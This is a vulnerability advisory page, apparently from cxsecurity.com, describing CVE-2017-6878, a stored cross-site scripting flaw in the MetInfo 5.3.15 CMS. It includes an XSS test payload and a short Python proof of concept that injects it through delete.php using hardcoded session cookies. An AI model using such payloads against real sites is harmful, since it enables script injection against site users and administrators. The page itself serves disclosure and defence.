MetInfo 5.3.15 Cross Site Scripting

2017.03.20
Credit: Arice.chen
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2017-6878
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS PSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPSPS [CVE-2017-6878]:MetInfo5.3.15 Stored Cross Site Scripting Application: MetInfo Versions Affected: 5.3.15 Vendor URL: http://www.metinfo.cn/ Software Link:http://www.metinfo.cn/upload/file/MetInfo5.3.zip Bugs: Stored XSS Author:Arice.chen(DBAPPSecurity Ltd) Description: MetInfo was established in March 2009, is a enterprise CMS, more than 40 m enterprises in the use of MeInfo build their own enterprise website. Vulnerability detailsPSo To modify, add a message in problem position insert JavaScript test code <img src=x onerror=alert(1)> Then the background access to relevant pages, or other users access to the front desk page will make the attack code is executed. --------------------------------------------- E-mailPSocallarice@163.com DBAppSecurity Ltd www.dbappsecurity.com.cn POC: import requests url = "http://192.168.0.28/MetInfo5.3/admin/column/delete.php?anyid=25&lang=cn&ajaxmetinfo=1&no_order_2=1&name_2=1<img src=x onerror=alert(2)>&nav_2=1&index_num_2=0&action=editor&lang=cn&anyid=25&allid=2," headers = { "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", } cookies = dict(PHPSESSID="9o2pth5a43hpj23nflnc7lfi24", recordurl="", met_auth="dfc7PoNLWryZ6Bu2hOEqxsEzRwMf3Nc%2BYqOWCxrSuQ2SivQF%2Fwfo0OP4JEP%2F7QakKJaXa46h5BB3nqrtt58caQaJcQ", met_key="pnZh0Fw", langset="cn", upgraderemind="1", tablepage_json="0%7Cuser%2Cadmin_user%2Cdojson_user_list" ) s = requests.get(url,cookies=cookies,headers=headers,timeout=10,verify=False) if s.status_code==200: print 'Success' Use this POC needs to obtain the cookie after login, because insert JavaScript place in the background. The problem find is delete.php?name_2= payload is :<img src=x onerror=alert(2)> If after the success of the insert JavaScript, to several places in the background and other users access to the front desk page to attack code execution


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top